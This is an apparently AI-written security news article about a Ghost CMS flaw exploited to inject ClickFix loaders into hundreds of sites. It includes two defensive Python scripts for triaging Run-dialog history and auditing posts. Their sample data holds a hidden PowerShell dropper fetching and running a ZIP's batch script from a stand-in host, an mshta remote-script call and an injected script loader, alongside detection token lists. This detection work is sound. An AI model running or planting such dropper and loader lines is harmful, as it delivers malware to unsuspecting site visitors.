

Ethical Hacking News

Ghosts in the Machine: The Ghost CMS Vulnerability Exploited for ClickFix Attacks



Threat actors have been exploiting a critical security flaw in the Ghost content management system to hijack more than 700 websites and use them to stage ClickFix attacks, which trick visitors into running malware on their own machines. The flaw is tracked as CVE-2026-26980 and carries a CVSS score of 9.4. This article summarises what is known about the vulnerability and the campaign built on it, and lists the steps Ghost operators should take to protect their sites and their visitors.

  • Threat actors exploited CVE-2026-26980 to obtain a site's Admin API key without authorization and then used the Ghost Admin API to tamper with posts in bulk.
  • More than 700 websites have been hijacked this way.
  • The injected code sits at the bottom of each page and acts as a two-stage loader that retrieves the main payload at runtime from an external domain.
  • An Adspect-based cloaking script serves the real payload only to likely victims; security scanners and crawlers see a benign page.
  • Targeted visitors are shown a fake CAPTCHA verification page that starts a "ClickFix" attack, tricking them into pasting a command into the Windows Run dialog.



    Threat actors have been abusing a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript into more than 700 websites and use them to stage ClickFix attacks. Several large-scale poisoning campaigns have weaponized the vulnerability to gain write access to targeted sites.

    According to QiAnXin XLab, a Chinese security vendor, the threat actors exploit the vulnerability to "obtain the target site's Admin API Key without authorization and then use the Ghost Admin API to tamper with articles in bulk." The injected code is appended to the bottom of each tampered page and acts as a two-stage loader: a small stub that fetches the main payload at runtime from an external domain, so the published content itself reveals little about what visitors will actually run.

    The threat actors have used this technique to hijack several prominent websites across the university, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology sectors. The end goal is to trick visitors into completing a fake CAPTCHA verification that is really the entry point of a ClickFix attack.

    To make sure only real victims receive the payload while security scanners and crawlers see a benign page, the threat actors front the loader with a cloaking script powered by Adspect. The script collects fingerprint information from the visitor's browser and uploads it to a server, which decides whether to act (redirect, pop-up, download) and what to serve. It also supports 19 commands for running arbitrary JavaScript, giving the operators remote control of the victim's browser.

    Site visitors deemed intended targets are ultimately shown a fake CAPTCHA verification page inside an iframe, which launches the ClickFix lure: the page instructs them to copy a Base64-encoded command and paste it into the Windows Run dialog. That command acts as a dropper: it retrieves a ZIP archive, extracts a Windows batch script from it, and runs the script on the victim's system.

    The end goal is to drop a Windows executable. In one case it was a PuTTY client carrying a valid code-signing certificate; in others it was an Inno Setup installer for an Electron application, a modified build of the open-source Grape desktop client.
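    The ClickFix chain above leaves a forensic trail on the victim's machine: whatever was pasted into the Run dialog is recorded in the user's RunMRU registry key. The Python triage helper below is an added example written for this article, not code from the XLab report or from any tool involved in the campaign. It assumes the RunMRU values have already been exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (where the MRUList value orders entries newest-first and each entry ends in "\1") and that the lure used the common powershell -EncodedCommand form; the article only says the pasted command was Base64-encoded, so that shape is an assumption, and every entry, hostname and payload below is constructed. It also goes slightly beyond the article by flagging other Run-dialog interpreters (mshta, cmd, curl, certutil) that ClickFix lures commonly abuse.

```python
"""Triage Windows Run-dialog history (RunMRU) for ClickFix-style commands.

Added example for this article, not from the XLab report. Assumes an
exported RunMRU key (MRUList = order, entries end in "\\1") and the common
powershell -EncodedCommand lure shape. All sample data is constructed.
"""
import base64
import re

# Interpreters and download helpers ClickFix lures typically invoke from the
# Run dialog (assumed list; extend it for your environment).
LURE_INTERPRETERS = {"powershell", "pwsh", "mshta", "cmd", "curl", "certutil",
                     "bitsadmin", "rundll32", "wscript", "cscript"}

# Substrings marking hidden windows, policy bypass, remote fetch, and the
# fetch-ZIP / extract / run-batch steps the article describes.
RISKY_TOKENS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
                "-ep bypass", "-executionpolicy bypass", "iex",
                "invoke-expression", "iwr", "invoke-webrequest",
                "downloadstring", "frombase64string", "http://", "https://",
                "expand-archive", ".zip", ".bat")

# powershell -e / -ec / -enc / -EncodedCommand <Base64 of UTF-16LE script>
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def parse_runmru(values):
    """Return the typed commands, newest first, from a dict of RunMRU values."""
    commands = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def decode_encoded_command(blob):
    """Decode an -EncodedCommand blob. PowerShell expects UTF-16LE; fall back
    to UTF-8 for hand-rolled lures. Returns None if it is not valid Base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            return raw.decode(encoding)
        except UnicodeDecodeError:
            continue
    return None


def triage_command(cmd):
    """Classify one Run-dialog command; returns a dict with the evidence."""
    stripped = cmd.strip()
    if stripped.startswith('"') and '"' in stripped[1:]:
        first = stripped[1:stripped.index('"', 1)]      # quoted full path
    else:
        first = re.split(r"\s+", stripped)[0]
    interpreter = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if interpreter.endswith(".exe"):
        interpreter = interpreter[:-4]
    indicators = [t for t in RISKY_TOKENS if t in cmd.lower()]
    match = ENCODED_FLAG.search(cmd)
    decoded = decode_encoded_command(match.group(1)) if match else None
    if decoded:
        # Indicators inside the decoded script are the ones the Base64
        # wrapper exists to hide from the victim, so count them too.
        indicators += [t for t in RISKY_TOKENS
                       if t in decoded.lower() and t not in indicators]
    return {
        "command": cmd, "interpreter": interpreter, "decoded": decoded,
        "encoded": match is not None, "indicators": indicators,
        "suspicious": interpreter in LURE_INTERPRETERS
                      and (match is not None or bool(indicators)),
    }


def triage_runmru(values):
    """Parse and triage a whole RunMRU export, newest entry first."""
    return [triage_command(cmd) for cmd in parse_runmru(values)]


# Constructed RunMRU export. The hidden PowerShell dropper mirrors the chain
# in the article: fetch a ZIP, extract it, run the batch script inside.
SAMPLE_DROPPER = ('$z="$env:TEMP\\u.zip";iwr https://update.example.invalid/u.zip '
                  '-OutFile $z;Expand-Archive $z "$env:TEMP\\u" -Force;'
                  '& "$env:TEMP\\u\\run.bat"')
SAMPLE_B64 = base64.b64encode(SAMPLE_DROPPER.encode("utf-16-le")).decode("ascii")
SAMPLE_RUNMRU = {
    "MRUList": "bcad",
    "a": "notepad\\1",
    "b": f"powershell -w hidden -nop -e {SAMPLE_B64}\\1",
    "c": "mshta https://verify.example.invalid/check.hta\\1",
    "d": "\\\\fileserver\\share\\1",
}

if __name__ == "__main__":
    for result in triage_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['interpreter']:12} {result['command'][:60]}")
        if result["decoded"]:
            print(f"           decoded: {result['decoded']}")
        if result["indicators"]:
            print(f"           indicators: {', '.join(result['indicators'])}")
```

    Run it against a real export by building the dict from the key's values (for example from a reg export or a forensic registry parser). The decoded script is printed in full because that is where the download host and the dropped file names live; those are the indicators to pivot on when notifying other visitors of a compromised site.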

    The vulnerability is tracked as CVE-2026-26980 and carries a CVSS score of 9.4; the BleepingComputer report linked below describes it as a SQL injection flaw. It was discovered by Anthropic using Claude and fixed in Ghost 6.19.1, released in February 2026.

    Ghost operators should upgrade to version 6.19.1 or later without delay. Patching alone does not evict an attacker who already holds an Admin API key, so sites that were compromised should also regenerate the Admin API keys of their integrations, audit every published post for script blocks appended at the end of the content, and remove the injected code. Site owners are also advised to notify users who may have visited during the contamination period so those users can check their machines for signs of a ClickFix infection.
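    For the audit step, the injected stub has two properties the article describes: it sits at the bottom of the rendered post and it loads, or builds at runtime, a script pointing at an external domain. The Python script below is an added example for this article (not Ghost's own code or XLab's tooling) that checks exported posts for exactly that, serving both the bulk-tampering description earlier and the cleanup advice here. It assumes the posts have been exported as a JSON list of objects with slug and html fields (the post objects the Ghost Admin API returns have those fields) and that the site's own origin and any intentionally embedded script hosts are known; the three posts and all hostnames are constructed.

```python
"""Audit exported Ghost posts for an injected bottom-of-page script loader.

Added example for this article, not Ghost's own code or XLab's tooling.
Assumes posts are a JSON list of objects with "slug" and "html" fields and
that the site's legitimate script hosts are known. All sample data is
constructed.
"""
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "blog.example.org"                         # assumed site origin
ALLOWED_SCRIPT_HOSTS = {SITE_HOST, "cdn.example.org"}  # assumed allow-list

# Inline behaviours typical of a two-stage loader: build a <script> element
# at runtime, point it at another host, or decode and evaluate remote code.
LOADER_PATTERNS = [
    re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I),
    re.compile(r"\.src\s*=\s*[^;]*https?:", re.I),
    re.compile(r"\b(?:fetch|XMLHttpRequest)\b[\s\S]*\beval\s*\(", re.I),
    re.compile(r"\batob\s*\(", re.I),
]


class ScriptCollector(HTMLParser):
    """Record every <script> with its src, inline body and the number of
    non-script tags opened before it. A script with no tags after it is the
    last thing on the page, which is where this campaign put its loader."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.tags_seen = 0
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": "",
                             "tags_before": self.tags_seen}
        else:
            self.tags_seen += 1

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_post(post, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of findings for one post dict with 'slug' and 'html'."""
    collector = ScriptCollector()
    collector.feed(post["html"])
    collector.close()
    findings = []
    for script in collector.scripts:
        reasons = []
        src = script["src"] or ""
        host = urlparse(src.strip()).hostname      # None for relative paths
        if host and host.lower() not in allowed_hosts:
            reasons.append(f"loads script from external host {host}")
        for pattern in LOADER_PATTERNS:
            if pattern.search(script["body"]):
                reasons.append(f"inline loader behaviour /{pattern.pattern}/")
                break
        if reasons:
            findings.append({
                "slug": post["slug"],
                "trailing": collector.tags_seen == script["tags_before"],
                "reasons": reasons,
                "snippet": (src or script["body"].strip())[:80],
            })
    return findings


def audit_export(export_json, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Audit a JSON string holding a list of posts; return every finding."""
    return [finding for post in json.loads(export_json)
            for finding in audit_post(post, allowed_hosts)]


# Constructed sample export: one clean post, one with an injected inline
# loader at the end, one with a trailing external <script src>.
SAMPLE_EXPORT = json.dumps([
    {"slug": "welcome", "html":
        '<h2>Welcome</h2><p>Hello.</p>'
        '<script src="https://cdn.example.org/widget.js"></script>'
        '<p>Footer text.</p>'},
    {"slug": "release-notes", "html":
        '<p>Changes in v2.</p><ul><li>Faster</li></ul>'
        "<script>(function(){var s=document.createElement('script');"
        "s.src='https://loader.example.net/a.js';document.body.appendChild(s);})();"
        '</script>'},
    {"slug": "about", "html":
        '<p>About us.</p><script src="//tracker.example.net/t.js"></script>'},
])

if __name__ == "__main__":
    for finding in audit_export(SAMPLE_EXPORT):
        where = "trailing" if finding["trailing"] else "mid-page"
        print(f"[{where}] {finding['slug']}: {'; '.join(finding['reasons'])}")
        print(f"    {finding['snippet']}")
```

    The allow-list is deliberately short: any script host you did not add yourself is a finding, and a finding at the trailing position on many posts at once is the bulk-tampering signature. Run the audit again after cleanup and after rotating the API keys, since an attacker who still holds a key can simply re-inject.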

    The campaign shows why a CMS flaw rarely stays a CMS problem: a bulk write primitive against published content turns trusted pages into a malware delivery channel for every visitor, and cloaking keeps the change invisible to the scanners that would otherwise catch it. Keeping Ghost current, treating API keys as credentials to be rotated after any incident, and periodically checking rendered pages for script tags that were never published are the practical defenses.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Ghosts-in-the-Machine-The-Ghost-CMS-Vulnerability-Exploited-for-ClickFix-Attacks-ehn.shtml

  • https://thehackernews.com/2026/05/ghost-cms-cve-2026-26980-exploited-to.html

  • https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/

  • https://nvd.nist.gov/vuln/detail/CVE-2026-26980

  • https://www.cvedetails.com/cve/CVE-2026-26980/


  • Published: Mon May 25 07:56:02 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News. All rights reserved.
